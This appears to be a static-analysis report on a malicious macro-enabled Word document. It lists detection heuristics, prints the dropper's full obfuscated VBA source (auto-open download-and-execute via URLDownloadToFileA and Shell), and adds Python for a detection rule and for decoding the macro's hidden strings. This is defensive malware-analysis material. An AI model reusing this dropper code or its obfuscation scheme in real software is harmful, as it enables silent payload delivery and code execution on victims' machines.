Verdict: MALICIOUS
Risk score: 348
Heuristics: 11

- ClamAV: Doc.Exploit.Generic-6923078-0 [critical] (CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Exploit.Generic-6923078-0
- VBA project inside OOXML [medium, 6 related findings] (OOXML_VBA)
  Document contains a VBA project; VBA macros are present.
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
  Matched line in script: YTcrPsgVYxnAt = Shell(YJjwtLBnGbJQcMdAOtRtaAk, 1)
- URLDownloadToFile in VBA [critical] (OLE_VBA_DOWNLOAD)
  Matched line in script: Private Declare PtrSafe Function URLDownloadToFileA Lib _
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below. In this sample the source was also recovered (macros.bas, below), and it shows the same pairing directly: Sub Auto_Open and Sub AutoOpen alongside URLDownloadToFileA and Shell.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
  Matched line in script: Sub AutoOpen()
- Auto_Open macro [low] (OLE_VBA_AUTO)
  Matched line in script: Sub Auto_Open()
- Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
  Matched line in script: qMVzkJB wVfCvEwPkUNuabbMHoaVYZiRqTUFwDZ(yyxjViBNbBDDmtYSckXIIwjyYEUk), Environ(VFIbzSrdxVvkmuKqglboHGjagyhTyMB(MehjduHGmIOJYbhtKEEZljDZK)) & _
- Macro/content-enable lure [medium] (SE_ENABLE_LURE)
  Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All twelve URLs below are standard OOXML/WordprocessingML XML namespace URIs (schemas.openxmlformats.org, schemas.microsoft.com/office): they name markup vocabularies and are not download or command-and-control endpoints. The URL the macro actually downloads from is held in an obfuscated constant and is not among them.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
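The pairing rule quoted in the OLE_VBA_PCODE_AUTOEXEC_EXEC finding, as an added example that is not the analyzer's own code: it lists the tokens of each class found in a compiled stream and fires only when both classes are present. The token lists are the ones given in the finding; the stream fragments are constructed here, and the assumption that identifier names appear in the stream either as 8-bit text or as UTF-16LE is the example's, not the report's.

```python
import re

# Added example (not the analyzer's code): the OLE_VBA_PCODE_AUTOEXEC_EXEC
# pairing rule, with the token lists quoted in the finding.
# Assumption: identifier names in a compiled/cache stream are visible either as
# 8-bit text or as UTF-16LE; the two de-interleaved views below catch the latter.

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _views(stream: bytes):
    """Three text views of one stream: raw 8-bit, and each UTF-16LE byte alignment."""
    return (stream.decode("latin-1"),
            stream[0::2].decode("latin-1"),
            stream[1::2].decode("latin-1"))


def _present(tokens, views):
    # Only a leading identifier boundary is required: "URLDownloadToFile" must
    # also hit the A/W-suffixed import names and "Shell" must hit "ShellExecute",
    # while "Shell" inside "PowerShell" is correctly not a separate hit.
    hits = []
    for tok in tokens:
        pat = re.compile(r"(?<![A-Za-z0-9_])" + re.escape(tok), re.IGNORECASE)
        if any(pat.search(v) for v in views):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream: bytes) -> dict:
    """Apply the pairing rule to one stream; it fires only when both classes match."""
    views = _views(stream)
    auto = _present(AUTOEXEC_TOKENS, views)
    execs = _present(EXEC_TOKENS, views)
    return {"fires": bool(auto) and bool(execs), "autoexec": auto, "exec": execs}


# Constructed stream fragments (not bytes taken from the analysed document).
SAMPLE_PAIRED = b"\x00\x01Auto_Open\x00\x02URLDownloadToFileA\x00\x07Shell\x00"
SAMPLE_AUTO_ONLY = "AutoOpen".encode("utf-16-le")           # wide entry point, no exec token
SAMPLE_EXEC_ONLY = b"\x00CreateObject\x00WScript.Shell\x00"  # exec tokens, no entry point

if __name__ == "__main__":
    for name, s in (("paired", SAMPLE_PAIRED), ("auto only", SAMPLE_AUTO_ONLY),
                    ("exec only", SAMPLE_EXEC_ONLY)):
        print(name, pcode_autoexec_exec(s))
```

On this document the recovered source already confirms the pairing (Auto_Open and AutoOpen next to URLDownloadToFileA and Shell), so the p-code rule is corroboration rather than the only evidence; its value is on samples where olevba cannot recover source and the compiled stream is all that is left to inspect.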
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5476 bytes |

SHA-256: 05c1eb02b238f2c62a6d2a92662f7a818df01d7a694c433e84f21055c657fdb0
Detection: ClamAV: No threats found (the Doc.Exploit.Generic-6923078-0 signature matched the compiled vbaProject.bin container, not this decoded source text)
Obfuscation or payload: likely. 35 of 63 identifiers look randomly generated (e.g. 'GtZLpVZqffSvRdNLkoyRnfkplAsVwbL'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Const yyxjViBNbBDDmtYSckXIIwjyYEUk = _
"ie+F\@!n{sXAo8IP5@w]n/ER5>!_x0?Q9<z^n3*(p"
Const MehjduHGmIOJYbhtKEEZljDZK = "(B+8(T6(;-*n24gO\lF1|{": Const ixwGFgIwUwxiGHRnTGZM = "<s*[qLb#FvF E?4`a:D#/^QM2MM"
Public DHzFEizqHDINEnzUDuXeCczoMrnuAbA As _
String
#If Win64 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib _
"urlmon" (ByVal XoyCPrKPxyuPAsLdkYilDHWJdIDUnSU As _
Long, ByVal _
fvuWrTbujWlTWtdcsxdGkyGsYwdvaZI As _
String, _
ByVal oWvARzoztFUdLLzPhKYsQVQC As _
String, _
ByVal lpPqihA As Long, _
ByVal jMqdJYJcUlCPTRmwgYDEyDXczFSATz As Long) As _
Long
#Else
Private Declare Function URLDownloadToFileA Lib "urlmon" ( _
ByVal XoyCPrKPxyuPAsLdkYilDHWJdIDUnSU As _
Long, _
ByVal fvuWrTbujWlTWtdcsxdGkyGsYwdvaZI As String, _
ByVal oWvARzoztFUdLLzPhKYsQVQC As _
String, ByVal lpPqihA As _
Long, _
ByVal jMqdJYJcUlCPTRmwgYDEyDXczFSATz As Long) As Long
#End If
Function _
qMVzkJB( _
cRxcGREF As String, _
YJjwtLBnGbJQcMdAOtRtaAk As _
String) As _
Boolean
Dim IKxnBRZdhkBJPVGbfloKEI As Long: IKxnBRZdhkBJPVGbfloKEI = _
URLDownloadToFileA( _
0, _
cRxcGREF, YJjwtLBnGbJQcMdAOtRtaAk, _
0, 0)
If IKxnBRZdhkBJPVGbfloKEI = 0 Then qMVzkJB = True
Dim YTcrPsgVYxnAt
YTcrPsgVYxnAt = Shell(YJjwtLBnGbJQcMdAOtRtaAk, 1)
End Function
Function wVfCvEwPkUNuabbMHoaVYZiRqTUFwDZ(mhndfSAyJc As _
String) As String
wVfCvEwPkUNuabbMHoaVYZiRqTUFwDZ = BySdCfeiggfkSBuelIyEWnPBzEdnbeC(mhndfSAyJc)
End Function
Public Sub _
tfyvzKgvTJdeym()
qMVzkJB wVfCvEwPkUNuabbMHoaVYZiRqTUFwDZ(yyxjViBNbBDDmtYSckXIIwjyYEUk), Environ(VFIbzSrdxVvkmuKqglboHGjagyhTyMB(MehjduHGmIOJYbhtKEEZljDZK)) & _
kVqsCzPwZuNWODOqxmUViPvZlgofVfv( _
ixwGFgIwUwxiGHRnTGZM)
End Sub
Sub Auto_Open()
tfyvzKgvTJdeym
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Function kVqsCzPwZuNWODOqxmUViPvZlgofVfv( _
xHTCoUhTdCzhFjYLfsPDXTo As String) As String
kVqsCzPwZuNWODOqxmUViPvZlgofVfv = _
BySdCfeiggfkSBuelIyEWnPBzEdnbeC(xHTCoUhTdCzhFjYLfsPDXTo)
End Function
Function BySdCfeiggfkSBuelIyEWnPBzEdnbeC( _
HEwWzbvklvRCFl As _
String) As _
String
Dim kZnMSAyYPVLYKPEjasLF As _
Byte, DddqMhqoVGfxaSkfwFczOkAAK As _
Long, _
GfGPblwh As Integer, _
WjicfjXDjnZWTjARdeHfx As Integer, mZRtktdPOrvqRAcjkOuWPIXWhYq As Long, MnplEDa As Long, VZnRhGNBUk As Long, AONnqFREWnA As String, _
cqBfmWCQbW As _
String, DVcmrMxQJQkUH As String, lHfmlnHKUxR As String, _
vDuYpyhAxUCKYqFPi As String
DVcmrMxQJQkUH = _
""
If HEwWzbvklvRCFl <> _
"" Then
lHfmlnHKUxR = _
HEwWzbvklvRCFl
kZnMSAyYPVLYKPEjasLF = _
&H532E - _
21121
WjicfjXDjnZWTjARdeHfx = _
InStr(HEwWzbvklvRCFl, Chr( _
kZnMSAyYPVLYKPEjasLF))
If DHzFEizqHDINEnzUDuXeCczoMrnuAbA = "" Then
vDuYpyhAxUCKYqFPi = """"
For mZRtktdPOrvqRAcjkOuWPIXWhYq = 7500 - _
&H1D2C To &H601E - 24480
If _
InStr( _
vDuYpyhAxUCKYqFPi, _
Chr(mZRtktdPOrvqRAcjkOuWPIXWhYq)) = _
0 Then DHzFEizqHDINEnzUDuXeCczoMrnuAbA = DHzFEizqHDINEnzUDuXeCczoMrnuAbA & Chr( _
mZRtktdPOrvqRAcjkOuWPIXWhYq)
Next _
mZRtktdPOrvqRAcjkOuWPIXWhYq
End If
VZnRhGNBUk = _
Len( _
DHzFEizqHDINEnzUDuXeCczoMrnuAbA)
cqBfmWCQbW = Left( _
lHfmlnHKUxR, _
WjicfjXDjnZWTjARdeHfx - _
1)
lHfmlnHKUxR = Right(lHfmlnHKUxR, _
Len(lHfmlnHKUxR) - WjicfjXDjnZWTjARdeHfx)
AONnqFREWnA = _
""
For _
mZRtktdPOrvqRAcjkOuWPIXWhYq = _
1 To Len(lHfmlnHKUxR) Step _
2
AONnqFREWnA = _
AONnqFREWnA & Mid(lHfmlnHKUxR, _
mZRtktdPOrvqRAcjkOuWPIXWhYq + _
1, _
1) & _
Mid( _
lHfmlnHKUxR, mZRtktdPOrvqRAcjkOuWPIXWhYq, 1)
Next _
mZRtktdPOrvqRAcjkOuWPIXWhYq
lHfmlnHKUxR = AONnqFREWnA
MnplEDa = 0
For mZRtktdPOrvqRAcjkOuWPIXWhYq = 1 To Len(lHfmlnHKUxR)
AONnqFREWnA = _
Mid(lHfmlnHKUxR, mZRtktdPOrvqRAcjkOuWPIXWhYq, _
1)
DddqMhqoVGfxaSkfwFczOkAAK = _
Asc( _
AONnqFREWnA)
WjicfjXDjnZWTjARdeHfx = InStr(DHzFEizqHDINEnzUDuXeCczoMrnuAbA, _
AONnqFREWnA)
If WjicfjXDjnZWTjARdeHfx = _
0 Then
If _
DddqMhqoVGfxaSkfwFczOkAAK >= (&H5F8C - _
24332) Then
DddqMhqoVGfxaSkfwFczOkAAK = DddqMhqoVGfxaSkfwFczOkAAK + _
(&H70B8 - _
28792)
If DddqMhqoVGfxaSkfwFczOkAAK > ( _
5070 - _
&H12CF) Then DddqMhqoVGfxaSkfwFczOkAAK = _
DddqMhqoVGfxaSkfwFczOkAAK - (&H5C50 - 23504)
AONnqFREWnA = _
Chr(DddqMhqoVGfxaSkfwFczOkAAK)
End If
DVcmrMxQJQkUH = DVcmrMxQJQkUH & AONnqFREWnA
Else
MnplEDa = MnplEDa + 1
If MnplEDa > Len( _
cqBfmWCQbW) Then MnplEDa = 1
GfGPblwh = Asc(Mid( _
cqBfmWCQbW, _
MnplEDa, _
1))
WjicfjXDjnZWTjARdeHfx = _
WjicfjXDjnZWTjARdeHfx - _
GfGPblwh
While _
WjicfjXDjnZWTjARdeHfx > _
VZnRhGNBUk
WjicfjXDjnZWTjARdeHfx = WjicfjXDjnZWTjARdeHfx - _
VZnRhGNBUk
Wend
While WjicfjXDjnZWTjARdeHfx < 0
WjicfjXDjnZWTjARdeHfx = WjicfjXDjnZWTjARdeHfx + VZnRhGNBUk
Wend
If _
WjicfjXDjnZWTjARdeHfx = 0 Then WjicfjXDjnZWTjARdeHfx = VZnRhGNBUk
DVcmrMxQJQkUH = _
DVcmrMxQJQkUH & Mid( _
DHzFEizqHDINEnzUDuXeCczoMrnuAbA, WjicfjXDjnZWTjARdeHfx, 1)
End If
Next mZRtktdPOrvqRAcjkOuWPIXWhYq
End If
BySdCfeiggfkSBuelIyEWnPBzEdnbeC = _
DVcmrMxQJQkUH
End Function
Function _
VFIbzSrdxVvkmuKqglboHGjagyhTyMB(EkBIRNijrwbkMjcAUIiVRKElql As String) As _
String
VFIbzSrdxVvkmuKqglboHGjagyhTyMB = BySdCfeiggfkSBuelIyEWnPBzEdnbeC(EkBIRNijrwbkMjcAUIiVRKElql)
End Function
Sub _
GtZLpVZqffSvRdNLkoyRnfkplAsVwbL()
Auto_Open
End Sub
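What the preview shows, read back from the obfuscated source: Auto_Open (and AutoOpen, which chains to it) calls tfyvzKgvTJdeym, which decodes three constants with BySdCfeiggfkSBuelIyEWnPBzEdnbeC and hands them to qMVzkJB as the download URL and as Environ(<variable name>) & <file name>, the local drop path. qMVzkJB calls URLDownloadToFileA(0, url, path, 0, 0) and then Shell(path, 1); the Shell call is not guarded by the download's return value, so the dropped path is launched even when the download fails. The decoder is a keyed substitution over a 94-symbol alphabet (Chr(32) to Chr(126) minus the double quote): each constant is split on Chr(173) into key and body, adjacent body characters are swapped back, and every alphabet character is shifted by the next key byte modulo 94; characters outside the alphabet with codes of 128 or more are shifted by 64 and wrapped at 255. Chr(173) is a soft hyphen, which text rendering often drops, so the Const strings quoted above may no longer carry the delimiter; decode from the bytes of a fresh olevba extraction rather than from this preview. The Python below is an added re-implementation of that routine for offline use, not code from the sample; the encoder is an inverse written here only to build a constructed test vector, since the sample ships none.

```python
# Added example (analyst re-implementation, not code from the sample): the
# string decoder the macro calls BySdCfeiggfkSBuelIyEWnPBzEdnbeC, with every
# hex/decimal expression from the VBA folded to its value.
# Assumption: characters are handled as code points, which matches VBA Chr()/Asc()
# for the single-byte range the routine works in.

DELIM = chr(173)      # &H532E - 21121 = 173 (soft hyphen) separates key from body

# Alphabet: Chr(32) .. Chr(126) with the double quote removed (94 symbols).
# 7500 - &H1D2C = 32, &H601E - 24480 = 126.
ALPHABET = "".join(chr(c) for c in range(32, 127) if chr(c) != '"')
N = len(ALPHABET)     # 94


def _swap_pairs(s: str) -> str:
    """Exchange each adjacent pair of characters; an odd trailing char stays put.

    Mirrors the Mid(s, i + 1, 1) & Mid(s, i, 1) loop; Mid past the end is ""."""
    return "".join(s[i + 1:i + 2] + s[i] for i in range(0, len(s), 2))


def vba_decode(blob: str) -> str:
    """Decode one obfuscated constant of the form <key> Chr(173) <body>."""
    if blob == "":
        return ""
    pos = blob.find(DELIM)
    if pos <= 0:
        # InStr = 0 makes the VBA Left() call fail; an empty key makes Asc("") fail.
        raise ValueError("no key/body delimiter Chr(173) in constant; re-extract the source")
    key, body = blob[:pos], _swap_pairs(blob[pos + 1:])
    out = []
    kpos = 0
    for ch in body:
        idx = ALPHABET.find(ch) + 1          # 1-based like InStr; 0 means not in alphabet
        if idx == 0:
            # Outside the alphabet: codes >= 128 (&H5F8C - 24332) are shifted by
            # 64 (&H70B8 - 28792) and wrapped past 255 (5070 - &H12CF) by subtracting
            # 128 (&H5C50 - 23504); everything else, the double quote included, passes.
            code = ord(ch)
            if code >= 128:
                code += 64
                if code > 255:
                    code -= 128
            out.append(chr(code))
            continue
        kpos = kpos + 1 if kpos < len(key) else 1   # MnplEDa cycles 1..Len(key)
        idx -= ord(key[kpos - 1])
        # The two While loops plus the "0 -> N" fix-up reduce idx into 1..N.
        idx = (idx - 1) % N + 1
        out.append(ALPHABET[idx - 1])
    return "".join(out)


def vba_encode(plain: str, key: str) -> str:
    """Inverse of vba_decode for alphabet characters (helper for test vectors only)."""
    if not key:
        raise ValueError("key must be non-empty")
    out = []
    kpos = 0
    for ch in plain:
        idx = ALPHABET.find(ch) + 1
        if idx == 0:
            raise ValueError(f"{ch!r} is outside the 94-symbol alphabet")
        kpos = kpos + 1 if kpos < len(key) else 1
        idx = (idx - 1 + ord(key[kpos - 1])) % N + 1
        out.append(ALPHABET[idx - 1])
    return key + DELIM + _swap_pairs("".join(out))


if __name__ == "__main__":
    # Constructed vector, not a constant from the sample: key "A" (Asc 65).
    sample = vba_encode("http", "A")        # "A" + Chr(173) + "WKSW"
    print(repr(sample), "->", vba_decode(sample))
```

Run vba_decode over the three Const values (yyxjViBNbBDDmtYSckXIIwjyYEUk, MehjduHGmIOJYbhtKEEZljDZK, ixwGFgIwUwxiGHRnTGZM, in that order) to recover the URL, the environment-variable name and the file-name suffix; the Shell target is the value of that variable concatenated with the suffix.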
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 20480 bytes |

SHA-256: 79713c47d64c1a3ce22e11eb0073843dbacb32afa1be38c6f63adfa7a16e44c7
Detection: ClamAV: Doc.Exploit.Generic-6923078-0
Obfuscation or payload: likely. 119 of 205 identifiers look randomly generated (e.g. 'GtZLpVZqffSvRdNLkoyRnfkplAsVwbL0'), consistent with name-mangling obfuscation.